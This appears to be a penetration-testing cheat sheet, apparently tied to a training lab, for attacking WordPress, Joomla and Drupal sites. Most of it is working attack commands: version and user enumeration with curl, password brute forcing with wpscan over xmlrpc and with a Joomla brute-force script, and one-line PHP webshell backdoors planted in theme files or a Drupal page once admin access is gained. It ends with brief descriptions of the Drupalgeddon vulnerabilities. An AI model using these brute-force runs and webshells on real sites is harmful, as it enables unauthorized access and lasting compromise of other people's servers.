CMS attacks
Common application attacks
This page covers attacks on these applications:
WordPress
Joomla
Drupal
WordPress
Grabbing information from the site
$ curl -s http://blog.inlanefreight.local | grep WordPress # WP version
$ curl -s http://blog.inlanefreight.local/ | grep themes # active theme
$ curl -s http://blog.inlanefreight.local/ | grep plugins # installed pluginsWordPress /robots.txt
/robots.txt User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/
Sitemap: https://<site>/wp-sitemap.xmlKey WordPress files
index.php
license.txt
wp-activate.php
wp-admin/login.php
wp-admin/wp-login.php
/login.php
/wp-login.php
xmlrpc.php
wp-config.phpKey WordPress folders
/uploads
/wp-contents
/wp-includesEnumerating Users
$ curl -s -I -X GET http://SERVER:PORT/?author=100
$ curl http://SERVER:PORT/wp-json/wp/v2/users | jq
[
{
"id": 1,
"name": "admin",
"url": "",
"description": "",
"link": "http://SERVER:PORT/index.php/author/admin/",
<SNIP>
},
{
"id": 2,
"name": "ch4p",
"url": "",
"description": "",
"link": "http://SERVER:PORT/index.php/author/ch4p/",
<SNIP>
},
<SNIP>Attacking accounts
Brute force using xmlrpc.php and wpscan
$ wpscan --password-attack xmlrpc -t 20 -U admin -P passwords.txt --url http://SERVER:PORTBackdoors in WordPress Admin
After logging in as admin, we can add a backdoor to their themes by placing this line in 404.php
system($_GET[0]);Joomla
Joomla robots.txt
robots.txt# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html
User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/Getting Joomla version
$ curl -s http://target/administrator/manifests/files/joomla.xml | xmllint --format -Enumerating with droopescan
droopescan$ droopescan scan joomla --url http://target/Brute forcing with joomla-bruteforce
joomla-bruteforcehttps://github.com/ajnik/joomla-bruteforce
$ sudo python3 joomla-brute.py -u http://target -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr adminBackdoors as Joomla Admin
After logging in as admin, we can add a backdoor to their themes by placing this line in error.php
system($_GET[0]);Drupal
Enumerating with droopescan
droopescan$ droopescan scan drupal --url http://target/RCE
Enable PHP Filter Module and create a new Basic Page that contains a PHP webshell. Make sure to set the Text format to PHP
<?php
system($_GET['3232ewql']);
?>In older Drupal version, PHP Filter Module comes installed by default. In newer versions, we will need to install it ourselves either through the admin page, or uploading it via ftp
Drupalgeddons
CVE-2014-3704, known as Drupalgeddon, affects versions 7.0 up to 7.31 and was fixed in version 7.32. This was a pre-authenticated SQL injection flaw that could be used to upload a malicious form or create a new admin user.
CVE-2018-7600, also known as Drupalgeddon2, is a remote code execution vulnerability, which affects versions of Drupal prior to 7.58 and 8.5.1. The vulnerability occurs due to insufficient input sanitization during user registration, allowing system-level commands to be maliciously injected.
CVE-2018-7602, also known as Drupalgeddon3, is a remote code execution vulnerability that affects multiple versions of Drupal 7.x and 8.x. This flaw exploits improper validation in the Form API.
Last updated